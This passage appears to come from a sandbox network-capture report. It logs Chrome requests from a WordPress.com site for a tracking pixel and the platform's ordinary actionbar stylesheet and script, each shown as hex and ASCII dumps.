                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:40 GMT
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Content-Length: 43
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                34192.168.2.1149798192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC601OUTGET /wp-content/mu-plugins/actionbar/actionbar.css?v=20241015 HTTP/1.1
                                                                                                                                                                                                                                                Host: s0.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC468INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                Content-Length: 15773
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                x-minify: t
                                                                                                                                                                                                                                                x-minify-cache: hit
                                                                                                                                                                                                                                                etag: W/18626-1729026647633.8218
                                                                                                                                                                                                                                                Expires: Wed, 15 Oct 2025 21:12:31 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC901INData Raw: 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 6e 6f 2d 64 69 73 70 6c 61 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 72 69 67 68 74 3a 31 30 70 78 3b 62 6f 72 64 65 72 3a 73
                                                                                                                                                                                                                                                Data Ascii: div#actionbar .no-display{display:none!important}div#actionbar *{box-sizing:border-box;outline:0;-webkit-tap-highlight-color:transparent;user-select:none;-webkit-user-select:none}div#actionbar{background:#fff;position:fixed;bottom:10px;right:10px;border:s
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 61 74 65 33 64 28 30 2c 31 35 30 70 78 2c 30 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 31 35 30 70 78 2c 30 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 31 35 30 70 78 2c 30 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 31 35 30 70 78 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 31 35 30 70 78 2c 30 29 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 2e 61 63 74 6e 62 72 2d 66 6f 6c 64 65 64 7b 6f 70 61 63 69 74 79 3a 2e 37 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 2e 61 63 74 6e 62 72 2d 66 6f 6c 64 65 64 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 31 7d 64 69 76 23 61 63 74 69 6f 6e 62
                                                                                                                                                                                                                                                Data Ascii: ate3d(0,150px,0);-moz-transform:translate3d(0,150px,0);-o-transform:translate3d(0,150px,0);-ms-transform:translate3d(0,150px,0);transform:translate3d(0,150px,0)}div#actionbar.actnbr-folded{opacity:.7}div#actionbar.actnbr-folded:hover{opacity:1}div#actionb
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 66 69 6c 6c 3a 23 33 63 34 33 34 61 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 6c 69 2e 61 63 74 6e 62 72 2d 62 74 6e 20 61 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 69 6e 67 2c 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 6c 69 2e 61 63 74 6e 62 72 2d 62 74 6e 20 61 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 69 6e 67 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 38 61 32 30 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 6c 69 2e 61 63 74 6e 62 72 2d 62 74 6e 20 61 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 69 6e 67 20 2e 67 72 69 64 69 63 6f 6e 2c 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 6c 69 2e 61 63 74 6e 62 72 2d 62 74 6e 20 61 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 69 6e 67 3a 68 6f 76 65
                                                                                                                                                                                                                                                Data Ascii: fill:#3c434a}div#actionbar li.actnbr-btn a.actnbr-actn-following,div#actionbar li.actnbr-btn a.actnbr-actn-following:hover{color:#008a20}div#actionbar li.actnbr-btn a.actnbr-actn-following .gridicon,div#actionbar li.actnbr-btn a.actnbr-actn-following:hove
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 2e 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 3e 2e 67 72 69 64 69 63 6f 6e 3a 68 6f 76 65 72 7b 66 69 6c 6c 3a 23 33 63 34 33 34 61 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 2e 74 69 70 2d 69 6e 6e 65 72 20 2e 67 72 69 64 69 63 6f 6e 7b 6d 61 72 67 69 6e 3a 30 20 35 70 78 20 30 20 30 3b 76 65 72 74
                                                                                                                                                                                                                                                Data Ascii: sform:rotate(0);-moz-transform:rotate(0);-o-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}div#actionbar .actnbr-ellipsis.actnbr-hidden>.gridicon:hover{fill:#3c434a}div#actionbar .actnbr-ellipsis .tip-inner .gridicon{margin:0 5px 0 0;vert
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 35 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 70 6f 70 6f 76 65 72 20 2e 74 69 70 2d 69 6e 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 63 64 63 64 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 35 70 78 20 72 67 62
                                                                                                                                                                                                                                                Data Ascii: 50%;margin-left:-10px;border-top-style:solid;border-bottom:none;border-left-color:transparent;border-right-color:transparent}div#actionbar .actnbr-popover .tip-inner{background-color:#fff;border:1px solid #dcdcde;border-radius:4px;box-shadow:0 2px 5px rgb
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 2d 66 6f 6c 6c 6f 77 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 30 66 30 66 30 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 6e 6f 74 69 63 65 20 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 2d 63 6f 75 6e 74 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 6c 69 20 61 3a 68 6f 76 65 72 20 2e 67 72 69 64 69 63 6f 6e 7b 66 69 6c 6c 3a 23 66 66 66 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 6c 69 20 2e 61 63 74 6e 62 72 2d 61 63 74
                                                                                                                                                                                                                                                Data Ascii: -follow{border-bottom:1px solid #f0f0f0;padding-bottom:10px;margin-bottom:10px}div#actionbar .actnbr-notice .actnbr-follow-count{margin-bottom:10px}div#actionbar .actnbr-ellipsis li a:hover .gridicon{fill:#fff}div#actionbar .actnbr-ellipsis li .actnbr-act
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 75 74 6f 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 6e 6f 74 69 63 65 20 66 6f 72 6d 20 62 75 74 74 6f 6e 5b 64 69 73 61 62 6c 65 64 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 62 63 65 65 66 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 63 64 63 64 65 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 6e 6f 74 69 63 65 20 2e 61 63 74 6e 62 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e
                                                                                                                                                                                                                                                Data Ascii: ;text-transform:none;-webkit-font-smoothing:auto;height:auto;width:100%}div#actionbar .actnbr-notice form button[disabled]{background:#bceefd;border-color:#dcdcde;color:#fff}div#actionbar .actnbr-notice .actnbr-button-wrap{text-align:right}div#actionbar .
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 6c 69 2e 61 63 74 6e 62 72 2d 66 6f 6c 64 65 64 2d 63 75 73 74 6f 6d 69 7a 65 20 61 2c 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 6c 69 2e 61 63 74 6e 62 72 2d 66 6f 6c 64 65 64 2d 66 6f 6c 6c 6f 77 20 61 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 2e 61 63 74 6e 62 72 2d 66 6f 6c 64 65 64 2e 61 63 74 6e 62 72 2d 68 61 73 2d 63 75 73 74 6f 6d 69 7a 65 2e 61 63 74 6e 62 72 2d 68 61 73 2d 65 64 69 74 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 6c 69 2e 61 63 74 6e 62 72 2d
                                                                                                                                                                                                                                                Data Ascii: {display:none}div#actionbar .actnbr-ellipsis li.actnbr-folded-customize a,div#actionbar .actnbr-ellipsis li.actnbr-folded-follow a{align-items:center;display:flex}div#actionbar.actnbr-folded.actnbr-has-customize.actnbr-has-edit .actnbr-ellipsis li.actnbr-
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 2d 62 75 62 62 6c 65 20 2e 61 63 74 6e 62 72 2d 73 69 74 65 2d 73 65 74 74 69 6e 67 73 5f 5f 73 65 74 74 69 6e 67 20 6c 61 62 65 6c 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2d 74 6f 67 67 6c 65 2d 63 6f 6e 74 72 6f 6c 5f 5f 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 23 32 65 34 34 35 33 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 66 6f 6c
                                                                                                                                                                                                                                                Data Ascii: ex;flex-direction:row;align-items:center}div#actionbar .actnbr-follow-bubble .actnbr-site-settings__setting label.components-toggle-control__label{color:#2e4453;margin:0;font-style:normal;font-size:14px;font-weight:300;width:100%}div#actionbar .actnbr-fol
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 6c 6f 77 2d 62 75 62 62 6c 65 20 2e 61 63 74 6e 62 72 2d 73 69 74 65 2d 73 65 74 74 69 6e 67 73 5f 5f 74 6f 67 67 6c 65 2e 69 73 2d 63 68 65 63 6b 65 64 20 73 70 61 6e 2e 61 63 74 6e 62 72 2d 73 69 74 65 2d 73 65 74 74 69 6e 67 73 5f 5f 74 6f 67 67 6c 65 5f 5f 74 68 75 6d 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 31 38 70 78 29 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 73 69 74 65 2d 73 65 74 74 69 6e 67 73 5f 5f 74 6f 67 67 6c 65 5f 5f 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 22 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72
                                                                                                                                                                                                                                                Data Ascii: low-bubble .actnbr-site-settings__toggle.is-checked span.actnbr-site-settings__toggle__thumb{background-color:#fff;border-width:0;transform:translateX(18px)}div#actionbar .actnbr-site-settings__toggle__input[type=checkbox]::before{content:""}div#actionbar


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                35192.168.2.1149799192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC586OUTGET /wp-content/mu-plugins/actionbar/actionbar.js?v=20231122 HTTP/1.1
                                                                                                                                                                                                                                                Host: s0.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:40 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 8426
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                x-minify: t
                                                                                                                                                                                                                                                x-minify-cache: hit
                                                                                                                                                                                                                                                etag: W/15307-1700657605752.4011
                                                                                                                                                                                                                                                Expires: Fri, 21 Nov 2025 13:06:30 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dca MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC888INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 77 69 6e 64 6f 77 2e 77 70 63 6f 6d 7c 7c 7b 7d 3b 65 2e 61 63 74 69 6f 6e 62 61 72 3d 7b 7d 3b 65 2e 61 63 74 69 6f 6e 62 61 72 2e 64 61 74 61 3d 77 69 6e 64 6f 77 2e 61 63 74 69 6f 6e 62 61 72 64 61 74 61 3b 63 6f 6e 73 74 20 74 3d 65 2e 61 63 74 69 6f 6e 62 61 72 2e 64 61 74 61 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 3d 7b 7d 2c 6f 3d 28 29 3d 3e 7b 7d 29 7b 69 66 28 21 65 2e 61 63 74 69 6f 6e 29 7b 72 65 74 75 72 6e 7d 66 65 74 63 68 28 74 2e 78 68 72 55 52 4c 2c 7b 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 62 6f 64 79 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 65 29 2c 68 65 61 64 65 72 73 3a 7b 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f
                                                                                                                                                                                                                                                Data Ascii: (function(){const e=window.wpcom||{};e.actionbar={};e.actionbar.data=window.actionbardata;const t=e.actionbar.data;function n(e={},o=()=>{}){if(!e.action){return}fetch(t.xhrURL,{method:"POST",body:new URLSearchParams(e),headers:{"Content-Type":"applicatio
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 74 2e 73 69 74 65 49 44 7d 29 7d 6c 65 74 20 61 3d 77 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 59 7c 7c 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 7c 7c 30 3b 69 66 28 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 74 6f 70 29 7b 72 65 74 75 72 6e 7d 63 6f 6e 73 74 20 6c 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 61 63 74 69 6f 6e 62 61 72 22 29 3b 69 66 28 21 6c 29 7b 72 65 74 75 72 6e 7d 6c 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 73 74 79 6c 65 22 29 3b 69 66 28 74 2e 73 74 61 74 75 73 4d 65 73 73 61 67 65 29 7b 54 28 74 2e 73 74 61 74 75 73 4d 65 73 73 61 67 65 29 7d 6c 65 74 20 64 3d 66 61 6c 73 65 3b 63 6f 6e 73 74 20 75 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d
                                                                                                                                                                                                                                                Data Ascii: t.siteID})}let a=window.scrollY||window.pageYOffset||0;if(window!=window.top){return}const l=document.querySelector("#actionbar");if(!l){return}l.removeAttribute("style");if(t.statusMessage){T(t.statusMessage)}let d=false;const u=l.querySelector(".actnbr-
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 69 63 6b 22 2c 65 3d 3e 7b 69 28 22 63 6f 6d 6d 65 6e 74 5f 63 6c 69 63 6b 65 64 22 29 3b 24 28 22 77 70 63 6f 6d 5f 61 63 74 69 6f 6e 62 61 72 5f 63 6f 6d 6d 65 6e 74 5f 63 6c 69 63 6b 22 2c 7b 75 72 6c 3a 74 2e 73 69 74 65 55 52 4c 2c 62 6c 6f 67 5f 69 64 3a 74 2e 73 69 74 65 49 44 2c 70 6f 73 74 5f 69 64 3a 74 2e 70 6f 73 74 49 44 7d 29 7d 29 7d 69 66 28 5f 29 7b 5f 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 3d 3e 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 63 6f 6e 73 74 20 6e 3d 65 2e 74 61 72 67 65 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 69 73 2d 63 68 65 63 6b 65 64 22 29 3b 63 6f 6e 73 74 20 6f 3d 60 2f 72 65 61 64 2f 73 69 74 65 73
                                                                                                                                                                                                                                                Data Ascii: ick",e=>{i("comment_clicked");$("wpcom_actionbar_comment_click",{url:t.siteURL,blog_id:t.siteID,post_id:t.postID})})}if(_){_.addEventListener("click",e=>{e.preventDefault();const n=e.target.parentElement.classList.toggle("is-checked");const o=`/read/sites
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 6f 73 74 49 44 7d 29 7d 29 7d 63 6f 6e 73 74 20 71 3d 28 65 2c 6e 29 3d 3e 7b 79 2e 66 6f 72 45 61 63 68 28 65 3d 3e 65 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 69 73 2d 73 65 6c 65 63 74 65 64 22 29 29 3b 65 2e 74 61 72 67 65 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 69 73 2d 73 65 6c 65 63 74 65 64 22 29 3b 63 6f 6e 73 74 20 6f 3d 60 2f 72 65 61 64 2f 73 69 74 65 2f 24 7b 74 2e 73 69 74 65 49 44 7d 2f 70 6f 73 74 5f 65 6d 61 69 6c 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2f 75 70 64 61 74 65 60 3b 73 28 6f 2c 22 72 65 73 74 2f 76 31 2e 32 22 2c 7b 64 65 6c 69 76 65 72 79 5f 66 72 65 71 75 65 6e 63 79 3a 6e 7d 29 7d 3b 69 66 28 79 2e 6c 65 6e 67
                                                                                                                                                                                                                                                Data Ascii: ostID})})}const q=(e,n)=>{y.forEach(e=>e.parentElement.classList.remove("is-selected"));e.target.parentElement.classList.add("is-selected");const o=`/read/site/${t.siteID}/post_email_subscriptions/update`;s(o,"rest/v1.2",{delivery_frequency:n})};if(y.leng
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 62 74 6e 22 29 3b 69 66 28 64 26 26 21 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 29 7b 64 3d 66 61 6c 73 65 3b 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 7d 7d 29 3b 63 6f 6e 73 74 20 53 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 73 68 6f 72 74 6c 69 6e 6b 20 61 22 29 3b 69 66 28 53 29 7b 53 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 3d 3e 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 69 66 28 77 69 6e 64 6f 77 2e 65 6c 65 63 74 72 6f 6e 29 7b 77 69 6e 64 6f 77 2e 65 6c 65 63 74 72 6f 6e 2e 73 65 6e 64 28 22 63 6f 70 79 2d 74 65 78 74 2d 74 6f 2d 63
                                                                                                                                                                                                                                                Data Ascii: btn");if(d&&!n.classList.contains("actnbr-hidden")){d=false;n.classList.add("actnbr-hidden")}});const S=l.querySelector(".actnbr-shortlink a");if(S){S.addEventListener("click",e=>{e.preventDefault();if(window.electron){window.electron.send("copy-text-to-c
